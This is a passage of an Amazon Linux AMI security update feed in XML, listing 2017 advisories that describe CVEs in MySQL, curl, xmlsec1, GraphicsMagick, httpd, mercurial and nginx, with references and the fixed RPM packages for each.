1472705:
CVE-2017-3649 mysql: Server: Replication unspecified vulnerability (CPU Jul 2017)
CVE-2017-3648:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Charsets). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1472704:
CVE-2017-3648 mysql: Server: Charsets unspecified vulnerability (CPU Jul 2017)
CVE-2017-3647:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1472703:
CVE-2017-3647 mysql: Server: Replication unspecified vulnerability (CPU Jul 2017)
CVE-2017-3641:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1472693:
CVE-2017-3641 mysql: Server: DML unspecified vulnerability (CPU Jul 2017)
CVE-2017-3635:
Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/C). Supported versions that are affected are 6.1.10 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors. Note: The documentation has also been updated for the correct way to use mysql_stmt_close(). Please see: https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-execute.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-fetch.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-close.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-error.html, https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-errno.html, and https://dev.mysql.com/doc/refman/5.7/en/mysql-stmt-sqlstate.html. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
1472685:
CVE-2017-3635 mysql: C API unspecified vulnerability (CPU Jul 2017)
CVE-2017-3634:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.6.36 and earlier and 5.7.18 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1472684:
CVE-2017-3634 mysql: Server: DML unspecified vulnerability (CPU Jul 2017)
CVE-2017-3633:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Memcached to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H).
1472683:
CVE-2017-3633 mysql: Server: Memcached unspecified vulnerability (CPU Jul 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3633" title="" id="CVE-2017-3633" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3634" title="" id="CVE-2017-3634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3635" title="" id="CVE-2017-3635" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3641" title="" id="CVE-2017-3641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3647" title="" id="CVE-2017-3647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3648" title="" id="CVE-2017-3648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3649" title="" id="CVE-2017-3649" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3651" title="" id="CVE-2017-3651" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3652" title="" id="CVE-2017-3652" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3653" title="" id="CVE-2017-3653" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-embedded-devel" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.37" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.37-1.26.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.37-1.26.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.37" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.37-1.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-889</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-889: medium priority package update for curl</title><issued date="2017-08-31 17:19:00" /><updated date="2017-08-31 23:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000101:
Details pending
1478309:
CVE-2017-1000101 curl: URL globbing out of bounds read
CVE-2017-1000100:
Details pending
1478310:
CVE-2017-1000100 curl: TFTP sends more than buffer size
CVE-2017-1000099:
Details pending
1478316:
CVE-2017-1000099 curl: FILE buffer read out of bounds
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000099" title="" id="CVE-2017-1000099" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000100" title="" id="CVE-2017-1000100" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000101" title="" id="CVE-2017-1000101" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.51.0" release="9.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.51.0-9.75.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.51.0" release="9.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.51.0-9.75.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.51.0" release="9.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.51.0-9.75.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.51.0" release="9.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.51.0-9.75.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.51.0" release="9.75.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.51.0-9.75.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.51.0" release="9.75.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.51.0-9.75.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.51.0" release="9.75.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.51.0-9.75.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.51.0" release="9.75.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.51.0-9.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-890</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-890: medium priority package update for xmlsec1</title><issued date="2017-09-13 22:22:00" /><updated date="2017-09-14 22:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000061:
It was discovered xmlsec1&#039;s use of libxml2 inadvertently enabled external entity expansion (XXE) along with validation. An attacker could craft an XML file that would cause xmlsec1 to try and read local files or HTTP/FTP URLs, leading to information disclosure or denial of service.
1437311:
CVE-2017-1000061 xmlsec1: xmlsec vulnerable to external entity expansion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000061" title="" id="CVE-2017-1000061" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xmlsec1-openssl" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-openssl-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-openssl-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-openssl-devel-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-nss" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-nss-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-gcrypt-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-gcrypt-devel-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-devel-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-gnutls" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-gnutls-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-nss-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-nss-devel-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-debuginfo" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-debuginfo-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-gnutls-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-gnutls-devel-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-gcrypt" version="1.2.20" release="7.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/xmlsec1-gcrypt-1.2.20-7.4.amzn1.x86_64.rpm</filename></package><package name="xmlsec1-openssl" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-openssl-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-gnutls" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-gnutls-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-debuginfo" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-debuginfo-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-nss" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-nss-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-gcrypt" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-gcrypt-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-openssl-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-openssl-devel-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-gcrypt-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-gcrypt-devel-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-devel-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-nss-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-nss-devel-1.2.20-7.4.amzn1.i686.rpm</filename></package><package name="xmlsec1-gnutls-devel" version="1.2.20" release="7.4.amzn1" epoch="0" arch="i686"><filename>Packages/xmlsec1-gnutls-devel-1.2.20-7.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-891</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-891: medium priority package update for GraphicsMagick</title><issued date="2017-09-13 22:44:00" /><updated date="2017-09-14 22:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-11403:
The ReadMNGImage function in coders/png.c in GraphicsMagick 1.3.26 has an out-of-order CloseBlob call, resulting in a use-after-free via a crafted file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11403" title="" id="CVE-2017-11403" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-doc" version="1.3.26" release="3.11.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.26-3.11.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.26" release="3.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.26-3.11.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.26" release="3.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.26-3.11.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.26" release="3.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.26-3.11.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.26" release="3.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.26-3.11.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.26" release="3.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.26-3.11.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.26" release="3.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.26-3.11.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.26" release="3.11.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.26-3.11.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.26" release="3.11.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.26-3.11.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.26" release="3.11.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.26-3.11.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.26" release="3.11.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.26-3.11.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.26" release="3.11.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.26-3.11.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.26" release="3.11.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.26-3.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-892</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-892: important priority package update for httpd</title><issued date="2017-09-13 22:50:00" /><updated date="2017-09-14 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9788:
It was discovered that the httpd&#039;s mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server.
1470748:
CVE-2017-9788 httpd: Uninitialized memory reflection in mod_auth_digest
CVE-2017-7679:
A buffer over-read flaw was found in the httpd&#039;s mod_mime module. A user permitted to modify httpd&#039;s MIME configuration could use this flaw to cause httpd child process to crash.
1463207:
CVE-2017-7679 httpd: mod_mime buffer overread
CVE-2017-3169:
A NULL pointer dereference flaw was found in the httpd&#039;s mod_ssl module. A remote attacker could use this flaw to cause an httpd child process to crash if another module used by httpd called a certain API function during the processing of an HTTPS request.
A NULL pointer dereference flaw was found in the httpd&#039;s mod_ssl module. A remote attacker could use this flaw to cause a httpd child process to crash if another module used by httpd called a certain API function during the processing of an HTTPS request.
1463197:
CVE-2017-3169 httpd: mod_ssl NULL pointer dereference
CVE-2017-3167:
It was discovered that the use of httpd&#039;s ap_get_basic_auth_pw() API function outside of the authentication phase could lead to authentication bypass. A remote attacker could possibly use this flaw to bypass required authentication if the API was used incorrectly by one of the modules used by httpd.
1463194:
CVE-2017-3167 httpd: ap_get_basic_auth_pw() authentication bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3167" title="" id="CVE-2017-3167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3169" title="" id="CVE-2017-3169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7679" title="" id="CVE-2017-7679" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9788" title="" id="CVE-2017-9788" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_ssl" version="2.2.34" release="1.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.34-1.12.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.34" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.34-1.12.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.34" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.34-1.12.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.34" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.34-1.12.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.34" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.34-1.12.amzn1.noarch.rpm</filename></package><package name="httpd" version="2.2.34" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.34-1.12.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.34" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.34-1.12.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.34" release="1.12.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.34-1.12.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.34" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.34-1.12.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.34" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.34-1.12.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.34" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.34-1.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-893</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-893: important priority package update for mercurial</title><issued date="2017-09-13 22:52:00" /><updated date="2017-09-14 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000116:
A shell command injection flaw related to the handling of &quot;ssh&quot; URLs has been discovered in Mercurial. This can be exploited to execute shell commands with the privileges of the user running the Mercurial client, for example, when performing a &quot;checkout&quot; or &quot;update&quot; action on a sub-repository within a malicious repository or a legitimate repository containing a malicious commit.
1479915:
CVE-2017-1000116 mercurial: command injection on clients through malicious ssh URLs
CVE-2017-1000115:
A vulnerability was found in the way Mercurial handles path auditing and caches the results. An attacker could abuse a repository with a series of commits mixing symlinks and regular files/directories to trick Mercurial into writing outside of a given repository.
1480330:
CVE-2017-1000115 Mercurial: pathaudit: path traversal via symlink
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000115" title="" id="CVE-2017-1000115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000116" title="" id="CVE-2017-1000116" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mercurial-python27" version="4.2.3" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-python27-4.2.3-1.29.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial" version="4.2.3" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/emacs-mercurial-4.2.3-1.29.amzn1.x86_64.rpm</filename></package><package name="mercurial-debuginfo" version="4.2.3" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-debuginfo-4.2.3-1.29.amzn1.x86_64.rpm</filename></package><package name="mercurial-common" version="4.2.3" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-common-4.2.3-1.29.amzn1.x86_64.rpm</filename></package><package name="mercurial-python26" version="4.2.3" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-python26-4.2.3-1.29.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial-el" version="4.2.3" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/emacs-mercurial-el-4.2.3-1.29.amzn1.x86_64.rpm</filename></package><package name="mercurial-common" version="4.2.3" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-common-4.2.3-1.29.amzn1.i686.rpm</filename></package><package name="emacs-mercurial" version="4.2.3" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/emacs-mercurial-4.2.3-1.29.amzn1.i686.rpm</filename></package><package name="mercurial-python26" version="4.2.3" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-python26-4.2.3-1.29.amzn1.i686.rpm</filename></package><package name="mercurial-debuginfo" version="4.2.3" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-debuginfo-4.2.3-1.29.amzn1.i686.rpm</filename></package><package name="mercurial-python27" version="4.2.3" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-python27-4.2.3-1.29.amzn1.i686.rpm</filename></package><package name="emacs-mercurial-el" version="4.2.3" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/emacs-mercurial-el-4.2.3-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-894</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-894: low priority package update for nginx</title><issued date="2017-09-13 23:19:00" /><updated date="2017-09-14 22:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7529:
A flaw within the processing of ranged HTTP requests has been discovered in the range filter module of nginx. A remote attacker could possibly exploit this flaw to disclose parts of the cache file header, or, if used in combination with third party modules, disclose potentially sensitive memory by sending specially crafted HTTP requests.
1468584:
CVE-2017-7529 nginx: Integer overflow in nginx range filter module leading to memory disclosure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7529" title="" id="CVE-2017-7529" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-all-modules" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-all-modules-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-geoip-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-mail" version="1.12.1" release="1.32.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-mail-1.12.1-1.32.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.12.1" release="1.32.amzn1" epoch="1" 